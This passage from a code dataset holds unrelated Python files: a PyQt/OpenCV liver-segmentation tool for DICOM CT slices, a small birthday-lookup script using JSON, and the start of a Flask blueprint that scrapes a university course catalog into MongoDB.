3, 3)\r\n img = cv2.addWeighted(self.Image, 1, canny, 1, 0)\r\n #print(\"CannyImage\")\r\n return img\r\n \r\n def FindContours(self,tarimg,img,Type=1):\r\n index = str(self.index)\r\n index = index.zfill(6)\r\n if Type == 1:\r\n contours, hierarchy = cv2.findContours(tarimg,cv2.RETR_CCOMP,cv2.CHAIN_APPROX_SIMPLE)\r\n cv2.drawContours(img,contours,-1,(0,0,255),3)\r\n backtorgb = cv2.cvtColor(img,cv2.COLOR_GRAY2RGB)\r\n cv2.drawContours(backtorgb,contours,-1,(0,0,255),3)\r\n cv2.imwrite (\"Produce_bmp/\"+index+\".bmp\", backtorgb)\r\n else:\r\n contours, hierarchy = cv2.findContours(tarimg,cv2.RETR_CCOMP,cv2.CHAIN_APPROX_SIMPLE)\r\n c_max = []\r\n c_maxArea = []\r\n for i in range(len(contours)):\r\n cnt = contours[i]\r\n area 
= cv2.contourArea(cnt)\r\n #perimeter = cv2.arcLength(cnt,True)\r\n c_maxArea.append(area)\r\n \r\n for c in range(len(contours)):\r\n cnt = contours[c]\r\n area = cv2.contourArea(cnt)\r\n #perimeter = cv2.arcLength(cnt,True)\r\n #if(area > max(c_maxArea)/3):\r\n c_max.append(cnt)\r\n print(area)\r\n self.setArea = self.setArea+area\r\n print(\"Summary:\"+str(self.setArea))\r\n #perimeter = cv2.arcLength(cnt,True)\r\n #print(perimeter)\r\n \r\n cv2.drawContours(img,c_max,-1,(0,0,255),3)\r\n backtorgb = cv2.cvtColor(img,cv2.COLOR_GRAY2RGB)\r\n cv2.drawContours(backtorgb,contours,-1,(0,0,255),3)\r\n cv2.imwrite (\"Produce_bmp/\"+index+\".bmp\", backtorgb)\r\n \r\n #print(\"FindContours\")\r\n return img\r\n \r\n def ConvertToDicom(self,img):\r\n ds = pydicom.read_file(self.fullpath)\r\n for i in range(0,img.shape[0]):\r\n for j in range(0,img.shape[1]):\r\n if(img[i,j] == 0):\r\n ds.pixel_array[i,j] = 0;\r\n ds.PixelData = ds.pixel_array.tostring() \r\n index = str(self.index)\r\n index = index.zfill(6)\r\n ds.save_as(\"Produce_dcm/\"+index+\".dcm\")\r\n print(\"# convert to 'Dicom' completed.\")\r\n \r\n def ResizeImageArray(self,img,cropType):\r\n areaVol = 0 \r\n for row in range(0,img.shape[0]):\r\n for col in range(0,img.shape[1]):\r\n if(img[row,col] == 255):\r\n areaVol += 1\r\n \r\n if(cropType == 2):\r\n if((areaVol - self.afreaVol) > 0):\r\n print(\"Current state: Liver is getting bigger!\")\r\n if(abs(areaVol - self.afreaVol) > areaVol/30):\r\n print(\"Current state: Liver gap is too large, back to original sample!\")\r\n else:\r\n self.CanyImage = self.ExtendImage(img,5)\r\n else:\r\n print(\"Current state: Liver is getting smaller!\")\r\n if(abs(areaVol - self.afreaVol) > areaVol/30):\r\n print(\"Current state: Liver gap is too large, back to original sample!\")\r\n else:\r\n self.CanyImage = self.ExtendImage(img,1)\r\n else:\r\n self.CanyImage = img\r\n \r\n self.afreaVol = areaVol\r\n print(\"Surface Area: \",areaVol)\r\n \r\n @jit\r\n def ExtendImage(self,result,value):\r\n for times in range(value):\r\n for row in range(0,result.shape[0]):\r\n for col in range(0,result.shape[1]):\r\n if(result[row,col] == 255):\r\n if(result[row-1,col] == 0):\r\n result[row-1,col] = 255\r\n if(result[row+1,col] == 0):\r\n result[row+1,col] = 254\r\n if(result[row,col-1] == 0):\r\n result[row,col-1] = 255\r\n if(result[row,col+1] == 0):\r\n result[row,col+1] = 254\r\n if(result[row,col] == 254):\r\n result[row,col] = 255\r\n #print(\"ExtendImage\")\r\n return result\r\n \r\n def SetRevealPixmap(self,img):\r\n rev.show()\r\n height, width = img.shape\r\n qImg = QImage(dicom.TargetImage.data, width, height, width, QImage.Format_Grayscale8)\r\n qPixImg = QPixmap(QPixmap.fromImage(qImg))\r\n rev.ui.label.setPixmap(qPixImg)\r\n \r\n def ReadTargetImage(self):\r\n #img = cv2.imread('Image\\TargetImage.jpg',0)\r\n #cv2.imshow(\"test\",img)\r\n cv2.waitKey(1)\r\n \r\n def ProcessImage(self,Multing=0):\r\n print(\"Index:\"+str(self.index))\r\n dicom.TargetImage = dicom.Image\r\n dicom.TargetImage = dicom.MedianBlurImage(dicom.TargetImage)\r\n dicom.TargetImage = dicom.BinaryImage(dicom.TargetImage,dicom.BoneValue)\r\n dicom.TargetImage = dicom.DilateImage(dicom.TargetImage)\r\n dicom.TargetImage = dicom.ClearTheBone(dicom.TargetImage)\r\n dicom.TargetImage = dicom.BinaryImage(dicom.TargetImage,dicom.LiverValue)\r\n dicom.TargetImage = dicom.CloseImage(dicom.TargetImage,3)\r\n dicom.TargetImage = dicom.MeasureLabel(dicom.TargetImage)\r\n dicom.TargetImage = dicom.OtsuImage(dicom.TargetImage)\r\n 
dicom.TargetImage = dicom.CloseImage(dicom.TargetImage,30)\r\n dicom.ResizeImageArray(dicom.TargetImage,1)\r\n tarImg = dicom.TargetImage.copy()\r\n tarImg2 = self.Image.copy()\r\n dicom.TargetImage = dicom.FindContours(tarImg,tarImg2) \r\n if(Multing == 0):\r\n self.CreateTempImage()\r\n th = threading.Thread(self.ReadTargetImage())\r\n th.start()\r\n print(\"process to 'Original Image' completed.\")\r\n print(\"=====================================\")\r\n \r\n def ProcessCropImage(self,Multing=False):\r\n print(\"Index:\"+str(self.index))\r\n dicom.TargetImage = self.Image\r\n for i in range(0,dicom.TargetImage.shape[0]):\r\n for j in range(0,dicom.TargetImage.shape[1]):\r\n if(dicom.CanyImage[i,j] == 0):\r\n dicom.TargetImage[i,j] = 0\r\n self.Image = cv2.imread(self.rpath,0)\r\n dicom.TargetImage = dicom.MedianBlurImage(dicom.TargetImage)\r\n tarImg = dicom.TargetImage.copy()\r\n tarImg = dicom.BinaryImage(tarImg,dicom.BoneValue)\r\n for i in range(0,tarImg.shape[0]):\r\n for j in range(0,tarImg.shape[1]):\r\n if(tarImg[i,j] != 0):\r\n dicom.TargetImage[i,j] = 0;\r\n dicom.TargetImage = dicom.BinaryImage(dicom.TargetImage,dicom.LiverValue)\r\n tarImg = dicom.TargetImage.copy()\r\n tarImg = dicom.CloseImage(tarImg,15)\r\n dicom.ResizeImageArray(tarImg,2)\r\n dicom.TargetImage = dicom.CloseImage(dicom.TargetImage,10)\r\n dicom.ConvertToDicom(dicom.TargetImage)\r\n tarImg = dicom.TargetImage.copy()\r\n tarImg2 = self.Image.copy()\r\n dicom.TargetImage = dicom.FindContours(tarImg,tarImg2,2) \r\n if(Multing == False):\r\n cv2.imwrite('Image\\TargetImage.jpg', dicom.TargetImage, [cv2.IMWRITE_JPEG_QUALITY, 90])\r\n self.CreateTempImage()\r\n #self.SetRevealPixmap()\r\n th = threading.Thread(self.ReadTargetImage())\r\n th.start()\r\n print(\"process to 'Inherit Image' completed.\")\r\n print(\"==================================\")\r\n\r\nclass MainUI(QDialog):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n self.ui = MainUI_Dialog()\r\n self.ui.setupUi(self)\r\n self.ui.spinBox.setRange(0, dicom.len-1)\r\n self.ui.spinBox_2.setRange(0, 255)\r\n self.ui.horizontalSlider.setMaximum(dicom.len-1)\r\n self.ui.verticalSlider.setMaximum(255)\r\n self.ui.spinBox.valueChanged.connect(self.SpinBoxValueChanged)\r\n self.ui.spinBox_2.valueChanged.connect(self.SpinBox2ValueChanged)\r\n self.ui.pushButton.clicked.connect(self.OnPushButtonClicked)\r\n self.ui.pushButton_2.clicked.connect(self.OnPushButton_2Clicked)\r\n self.ui.pushButton_7.clicked.connect(self.OnPushButton_7Clicked)\r\n self.ui.label.setScaledContents (True)\r\n self.pixmap = QPixmap(dicom.rpath)\r\n self.ui.label.setPixmap(self.pixmap)\r\n self.ui.label_5.setPixmap(self.pixmap)\r\n self.ui.spinBox.setValue(dicom.index)\r\n self.ui.spinBox_2.setValue(dicom.LiverValue)\r\n \r\n def SpinBoxValueChanged(self):\r\n dicom.Dicom2jpg(self.ui.spinBox.value())\r\n if dicom.LoopProcess == False:\r\n self.SetPixmap()\r\n self.SetOriginalPixmap(dicom.rpath) \r\n \r\n def SetPixmap(self):\r\n height, width = dicom.TargetImage.shape\r\n qImg = QImage(dicom.TargetImage.data, width, height, width, QImage.Format_Grayscale8)\r\n qPixImg = QPixmap(QPixmap.fromImage(qImg))\r\n self.ui.label.setPixmap(qPixImg)\r\n return qPixImg\r\n \r\n def SetOriginalPixmap(self,path):\r\n self.pixmap = QPixmap(path)\r\n self.ui.label_5.setPixmap(self.pixmap)\r\n \r\n def SpinBox2ValueChanged(self):\r\n if Initialization == True:\r\n dicom.LiverValue = self.ui.spinBox_2.value()\r\n \r\n def OnPushButtonClicked(self):\r\n if Initialization == True:\r\n dicom.TargetImage 
= dicom.Image\r\n dicom.ProcessImage()\r\n \r\n def OnPushButton_2Clicked(self):\r\n mul.ProcessBreak = False\r\n mul.ui.pushButton.setEnabled(False)\r\n mul.ui.pushButton_2.setEnabled(False)\r\n mul.ui.label.setText(\"Image Processing ...\")\r\n mul.ui.label_2.setText(\"Image Processing ...\")\r\n mul.ui.label_3.setText(\"Image Processing ...\")\r\n mul.ui.label_4.setText(\"Image Processing ...\")\r\n mul.ui.label_5.setText(\"Image Processing ...\")\r\n mul.ui.label_6.setText(\"Image Processing ...\")\r\n mul.ui.label_7.setText(\"Image Processing ...\")\r\n mul.ui.label_8.setText(\"Image Processing ...\")\r\n mul.show()\r\n win.hide()\r\n th = threading.Thread(target=self.StartMultiDialog)\r\n th.start()\r\n \r\n def OnPushButton_7Clicked(self):\r\n dir_choose = QFileDialog.getExistingDirectory(self,\"Select Data Folder\",\"src\\Dicoms\") \r\n\r\n if dir_choose == \"\":\r\n print(\"\\nCancel\")\r\n return\r\n\r\n print(\"\\nSelected Data Folder:\")\r\n print(dir_choose) \r\n dfiles = sorted_aphanumeric(os.listdir(dir_choose))\r\n dpath = \"Dicoms\"\r\n outpath = \"Registers\"\r\n \r\n try:\r\n #shutil.rmtree(dpath)\r\n #shutil.rmtree(outpath)\r\n os.system(\"rd/s/q \"+dpath)\r\n os.system(\"rd/s/q \"+outpath)\r\n pass\r\n except OSError as e:\r\n print(e)\r\n else:\r\n print(\"The directory is deleted successfully\")\r\n \r\n os.mkdir(dpath)\r\n os.mkdir(outpath)\r\n path = os.getcwd()\r\n for i in range(1,len(dfiles)):\r\n print(dfiles[i])\r\n print(dir_choose)\r\n fixedpath = os.path.abspath(dir_choose)\r\n inputpath = fixedpath + \"/\" +str(dfiles[i])\r\n fullpath = os.path.join(dpath, dfiles[i])\r\n shutil.copy(inputpath, dpath) \r\n os.system(\"cd \"+ path) \r\n cmd = 'dcm2jpg -o ' + os.path.abspath(outpath) + ' ' + os.path.abspath(fullpath)\r\n os.system(cmd)\r\n print(\"===========Data imported successfully, please restart the program!===========\")\r\n sys.exit(app.exec_())\r\n \r\n def LoopProcessCropImag(self):\r\n stage = 0\r\n for i in range(dicom.bottom_index,dicom.top_index+2):\r\n if Initialization == True:\r\n if stage == 0:\r\n dicom.ProcessCropImage()\r\n dicom.index = dicom.index + 1\r\n self.ui.spinBox.setValue(dicom.index)\r\n if dicom.index == dicom.top_index+1:\r\n stage = 1\r\n elif stage == 1:\r\n dicom.index = dicom.save_index-1\r\n self.ui.spinBox.setValue(dicom.index)\r\n dicom.TargetImage = dicom.Image\r\n dicom.ProcessImage()\r\n stage = 2\r\n elif stage == 2:\r\n dicom.ProcessCropImage()\r\n dicom.index = dicom.index - 1\r\n self.ui.spinBox.setValue(dicom.index) \r\n if dicom.index == dicom.bottom_index-1:\r\n print(\"Consecutive liver segmentation completed!\")\r\n self.tEnd = time.time()\r\n print(\"It cost %f sec\" % (self.tEnd - self.tStart))\r\n string = \"Index:\"+str(dicom.bottom_index)+\" to \"+str(dicom.top_index)+\"slice\\nTime:\"+str(self.tEnd - self.tStart)+\"seconds\\nSurface:\"+ str(dicom.setArea) + \"\"\r\n SaveLogs(string)\r\n dicom.LoopProcess = False\r\n \r\n def SetLabelPixmap(self,sheet):\r\n if sheet == 0:\r\n mul.ui.label.setPixmap(self.pix[0])\r\n elif sheet == 1:\r\n mul.ui.label_2.setPixmap(self.pix[1])\r\n elif sheet == 2:\r\n mul.ui.label_3.setPixmap(self.pix[2])\r\n elif sheet == 3:\r\n mul.ui.label_4.setPixmap(self.pix[3])\r\n elif sheet == 4:\r\n mul.ui.label_5.setPixmap(self.pix[4])\r\n elif sheet == 5:\r\n mul.ui.label_6.setPixmap(self.pix[5])\r\n elif sheet == 6:\r\n mul.ui.label_7.setPixmap(self.pix[6])\r\n elif sheet == 7:\r\n mul.ui.label_8.setPixmap(self.pix[7])\r\n \r\n def StartMultiDialog(self):\r\n self.OriginalValue 
= dicom.LiverValue\r\n self.value = [dicom.LiverValue+80,dicom.LiverValue+60,dicom.LiverValue+40,dicom.LiverValue+20,dicom.LiverValue,dicom.LiverValue-20,dicom.LiverValue-40,dicom.LiverValue-60]\r\n for i in range(len(self.value)):\r\n if self.value[i] > 250:\r\n self.value[i] = 250\r\n elif self.value[i] < 1:\r\n self.value[i] = 1\r\n self.pix = []\r\n mul.ui.radioButton.setText(\"\"+str(self.value[0]))\r\n mul.ui.radioButton_2.setText(\"\"+str(self.value[1]))\r\n mul.ui.radioButton_3.setText(\"\"+str(self.value[2]))\r\n mul.ui.radioButton_4.setText(\"\"+str(self.value[3]))\r\n mul.ui.radioButton_5.setText(\"\"+str(self.value[4]))\r\n mul.ui.radioButton_6.setText(\"\"+str(self.value[5]))\r\n mul.ui.radioButton_7.setText(\"\"+str(self.value[6]))\r\n mul.ui.radioButton_8.setText(\"\"+str(self.value[7]))\r\n for i in range(8):\r\n if mul.ProcessBreak == False:\r\n print(\"The \"+str(i+1)+\" image is being processed.\")\r\n dicom.LiverValue = self.value[i]\r\n dicom.ProcessImage(1)\r\n self.pix.append(self.SetPixmap())\r\n self.SetLabelPixmap(i)\r\n \r\n mul.ui.pushButton.setEnabled(True)\r\n mul.ui.pushButton_2.setEnabled(True)\r\n dicom.LiverValue = self.OriginalValue\r\n\r\n \r\nclass MultiUI(QDialog):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n self.ui = Multi_Dialog()\r\n self.ui.setupUi(self)\r\n self.ui.pushButton.clicked.connect(self.OnPushButtonClicked)\r\n self.ui.pushButton_2.clicked.connect(self.OnPushButton_2Clicked)\r\n self.ui.label.setScaledContents(True)\r\n self.ui.label_2.setScaledContents(True)\r\n self.ui.label_3.setScaledContents(True)\r\n self.ui.label_4.setScaledContents(True)\r\n self.ui.label_5.setScaledContents(True)\r\n self.ui.label_6.setScaledContents(True)\r\n self.ui.label_7.setScaledContents(True)\r\n self.ui.label_8.setScaledContents(True)\r\n self.ProcessBreak = False\r\n \r\n def OnPushButtonClicked(self):\r\n self.ProcessBreak = True\r\n if self.ui.radioButton.isChecked():\r\n dicom.LiverValue = win.value[0]\r\n elif self.ui.radioButton_2.isChecked():\r\n dicom.LiverValue = win.value[1]\r\n elif self.ui.radioButton_3.isChecked():\r\n dicom.LiverValue = win.value[2]\r\n elif self.ui.radioButton_4.isChecked():\r\n dicom.LiverValue = win.value[3]\r\n elif self.ui.radioButton_5.isChecked():\r\n dicom.LiverValue = win.value[4]\r\n elif self.ui.radioButton_6.isChecked():\r\n dicom.LiverValue = win.value[5]\r\n elif self.ui.radioButton_7.isChecked():\r\n dicom.LiverValue = win.value[6]\r\n elif self.ui.radioButton_8.isChecked():\r\n dicom.LiverValue = win.value[7]\r\n \r\n win.ui.spinBox_2.setValue(dicom.LiverValue)\r\n dicom.ProcessImage()\r\n mul.hide()\r\n win.show()\r\n \r\n def OnPushButton_2Clicked(self):\r\n self.ProcessBreak = True\r\n dicom.TargetImage = dicom.Image\r\n dicom.CreateTempImage()\r\n mul.hide()\r\n win.show()\r\n \r\nclass RevealUI(QDialog):\r\n \r\n def __init__(self):\r\n super().__init__()\r\n self.ui = Reveal_Dialog()\r\n self.ui.setupUi(self)\r\n \r\n\r\n \r\nif __name__ == '__main__':\r\n np.set_printoptions(threshold=np.inf)\r\n dicom = Dicom()\r\n app = QApplication(sys.argv)\r\n win = MainUI()\r\n mul = MultiUI()\r\n rev = RevealUI()\r\n win.show()\r\n #mul.show()\r\n #dicom.ProcessImage()\r\n Initialization = True\r\n sys.exit(app.exec_())\r\n", "sub_path": "Main.py", "file_name": "Main.py", "file_ext": "py", "file_size_in_byte": 22745, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "re.split", "line_number": 28, "usage_type": "call"}, 
{"api_name": "datetime.datetime.now", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 70, "usage_type": "call"}, {"api_name": "os.system", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.medianBlur", "line_number": 91, "usage_type": "call"}, {"api_name": "cv2.threshold", "line_number": 96, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 96, "usage_type": "attribute"}, {"api_name": "cv2.threshold", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.THRESH_OTSU", "line_number": 101, "usage_type": "attribute"}, {"api_name": "cv2.getStructuringElement", "line_number": 106, "usage_type": "call"}, {"api_name": "cv2.MORPH_RECT", "line_number": 106, "usage_type": "attribute"}, {"api_name": "cv2.dilate", "line_number": 107, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 124, "usage_type": "attribute"}, {"api_name": "cv2.morphologyEx", "line_number": 125, "usage_type": "call"}, {"api_name": "cv2.MORPH_CLOSE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "skimage.measure.label", "line_number": 130, "usage_type": "call"}, {"api_name": "skimage.measure", "line_number": 130, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 131, "usage_type": "call"}, {"api_name": "skimage.measure.regionprops", "line_number": 132, "usage_type": "call"}, {"api_name": "skimage.measure", "line_number": 132, "usage_type": "attribute"}, {"api_name": "skimage.morphology.remove_small_objects", "line_number": 137, "usage_type": "call"}, {"api_name": "skimage.morphology", "line_number": 137, "usage_type": "attribute"}, {"api_name": "warnings.catch_warnings", "line_number": 138, "usage_type": "call"}, {"api_name": "warnings.simplefilter", "line_number": 139, "usage_type": "call"}, {"api_name": "skimage.img_as_ubyte", "line_number": 140, "usage_type": "call"}, {"api_name": "cv2.Canny", "line_number": 147, "usage_type": "call"}, {"api_name": "cv2.addWeighted", "line_number": 148, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 156, "usage_type": "call"}, {"api_name": "cv2.RETR_CCOMP", "line_number": 156, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 156, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 157, "usage_type": "call"}, 
{"api_name": "cv2.cvtColor", "line_number": 158, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2RGB", "line_number": 158, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 159, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 160, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 162, "usage_type": "call"}, {"api_name": "cv2.RETR_CCOMP", "line_number": 162, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 162, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 167, "usage_type": "call"}, {"api_name": "cv2.contourArea", "line_number": 173, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 183, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 184, "usage_type": "call"}, {"api_name": "cv2.COLOR_GRAY2RGB", "line_number": 184, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 185, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 186, "usage_type": "call"}, {"api_name": "pydicom.read_file", "line_number": 192, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 229, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 251, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage.Format_Grayscale8", "line_number": 251, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 252, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 252, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 258, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 278, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 290, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 308, "usage_type": "call"}, {"api_name": "cv2.IMWRITE_JPEG_QUALITY", "line_number": 308, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 311, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 316, "usage_type": "name"}, {"api_name": "MainUI.MainUI_Dialog", "line_number": 320, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 332, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 346, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage.Format_Grayscale8", "line_number": 346, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 347, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 347, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 352, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 378, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getExistingDirectory", "line_number": 382, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 382, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 390, "usage_type": "call"}, {"api_name": "os.system", "line_number": 397, "usage_type": "call"}, {"api_name": "os.system", "line_number": 398, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 405, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 406, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 407, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 411, "usage_type": "call"}, {"api_name": "os.path", "line_number": 411, "usage_type": "attribute"}, {"api_name": "os.path.join", 
"line_number": 413, "usage_type": "call"}, {"api_name": "os.path", "line_number": 413, "usage_type": "attribute"}, {"api_name": "shutil.copy", "line_number": 414, "usage_type": "call"}, {"api_name": "os.system", "line_number": 415, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 416, "usage_type": "call"}, {"api_name": "os.path", "line_number": 416, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 417, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 419, "usage_type": "call"}, {"api_name": "time.time", "line_number": 443, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 497, "usage_type": "name"}, {"api_name": "MainUI.Multi_Dialog", "line_number": 501, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 546, "usage_type": "name"}, {"api_name": "MainUI.Reveal_Dialog", "line_number": 550, "usage_type": "call"}, {"api_name": "numpy.set_printoptions", "line_number": 556, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 556, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 558, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 558, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 566, "usage_type": "call"}]} +{"seq_id": "134041786", "text": "import json\n\n# json\nfriends = {'friends': [\n {\n 'name': 'Hayeon',\n 'bday': '24/08/1996'\n },\n {\n 'name': 'Minsoo',\n 'bday': '21/04/1997'\n },\n {\n 'name': 'Gayeon',\n 'bday': '24/09/1997'\n },\n]\n}\n\n\n# Load\ndef load():\n if open('friends.json') is not None:\n with open('friends.json') as in_f:\n return json.load(in_f)\n\n\n# Save\ndef save():\n with open('friends.json', 'w') as out_f:\n json.dump(friends, out_f)\n\n\n# Find the key and return value\ndef find(name):\n for key in friends['friends']:\n if key['name'] == name:\n return key['bday']\n return print(\"Enter name correctly\")\n\n\nsave()\nfriends = load()\nwhile True:\n print('---------------------------')\n name = input('Enter name for searching(enter 0 for terminate): ')\n if name == '0':\n save()\n break\n else:\n print(find(name))\n add = input('Want to add your friend(type yes if you want) ')\n if add == 'yes':\n input_name = input('Enter the name for updating: ')\n input_bday = input('Enter the birthday for updating: ')\n friends['friends'].append(\n {\n 'name': input_name,\n 'bday': input_bday\n }\n )\n save()", "sub_path": "Homework1,2,3/Homework_1_birthday/project_2.py", "file_name": "project_2.py", "file_ext": "py", "file_size_in_byte": 1248, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "json.load", "line_number": 25, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "299039699", "text": "from time import time\nfrom flask.helpers import make_response\nimport requests\nimport re\nfrom flask import Blueprint, current_app, request, jsonify\nfrom requests.api import get\nfrom services import mongo\nfrom bson import json_util\nfrom utils import queryFromArgs, bsonify, bsonifyList, prepQuery\nimport json\nimport users\nfrom flask_jwt_extended import jwt_required, get_jwt_identity\nfrom datetime import datetime as dt, tzinfo\nfrom datetime import timedelta \nimport pytz\n\nbp = Blueprint('courses', __name__)\n\ndb = mongo.get_default_database()\n\ncourses_col = db['courses_collection']\n\n# Constants\nurl= 
\"https://www-banner.aub.edu.lb/catalog/\"\nschedByLetters = [\n \"schd_A.htm\", \n \"schd_B.htm\", \n \"schd_C.htm\", \n \"schd_D.htm\", \n \"schd_E.htm\", \n \"schd_F.htm\", \n \"schd_G.htm\", \n \"schd_H.htm\", \n \"schd_I.htm\", \n \"schd_J.htm\", \n \"schd_K.htm\", \n \"schd_L.htm\", \n \"schd_M.htm\", \n \"schd_N.htm\", \n \"schd_O.htm\", \n \"schd_P.htm\", \n \"schd_Q.htm\", \n \"schd_R.htm\", \n \"schd_S.htm\", \n \"schd_T.htm\", \n \"schd_U.htm\", \n \"schd_V.htm\", \n \"schd_W.htm\", \n \"schd_X.htm\", \n \"schd_Y.htm\", \n \"schd_Z.htm\", \n]\n\ndef _getHTML(base,endpoint):\n response = requests.get(base+endpoint)\n html = str(response.content)\n return html\n\ndef _getClassesFromPage(html):\n pattern = \"[^<]*<\\/TD>\"\n results = re.findall(pattern,html)\n\n classes = []\n\n for i in range(0,len(results)-1,37):\n row = results[i:i+37]\n row = [d[4:-5] for d in row ]\n \n classData = {\n 'CRN': row[1],\n 'SUBJECT': row[2],\n 'CODE': row[3],\n 'SECTION': row[4],\n 'ERROR': False\n }\n\n try:\n s1_start = row[11]\n classData['S1_START'] =(int(s1_start[:2]),int(s1_start[2:])) if len(s1_start)==4 else (-1,-1)\n s1_end = row[12]\n\n classData['S1_END'] =(int(s1_end[:2]),int(s1_end[2:])) if len(s1_end)==4 else (-1,-1)\n\n classData['S1_DAYS'] = [ d != '.' for d in row[15:20]]\n\n classData['S1_LOC'] = row[13]+\"-\"+row[14]\n\n s2_start = row[22]\n classData['S2_START'] =(int(s2_start[:2]),int(s2_start[2:])) if len(s2_start)==4 else (-1,-1)\n s2_end = row[23]\n classData['S2_END'] =(int(s2_end[:2]),int(s2_end[2:])) if len(s2_end)==4 else (-1,-1)\n\n classData['S2_DAYS'] = [ d != '.' for d in row[26:33]]\n classData['S2_LOC'] = row[24]+\"-\"+row[25]\n except:\n classData['ERROR'] = True\n print(i//37)\n\n\n classes.append(classData)\n \n return classes\n\ndef getClasses(url, endpoints):\n classes = []\n for s in schedByLetters:\n html = _getHTML(url,s)\n if s == 'schd_C.htm':\n html = html.replace(\"30761<\\\\n/TD>\",\"30761\",1)\n \n classes+=_getClassesFromPage(html)\n return classes\n \n\ndef initCoursesDB():\n\n courses_col.delete_many({})\n\n classes = getClasses(url, schedByLetters)\n print(\"LOADED COURSES FROM AUB\")\n #courses_col.delete_many({})\n for cl in classes:\n courses_col.insert_one(cl)\n\n\ndef _getCourseByCRN(CRN):\n return courses_col.find_one({'CRN': CRN})\n\n@bp.route('/byCRN/')\n#@jwt_required()\ndef getCourseByCRN(CRN):\n course = _getCourseByCRN(CRN)\n\n if course:\n return jsonify(bsonify(course))\n else:\n return make_response('COURSE NOT FOUND',404)\n\n\n@bp.route('/setCRNs', methods=['POST'])\n@jwt_required()\ndef setCourses():\n userID = get_jwt_identity()\n \n data = request.json\n\n ls = [] \n for course in data['classes']:\n if re.fullmatch('[0-9]{5}',course):\n ls.append(course)\n else:\n return 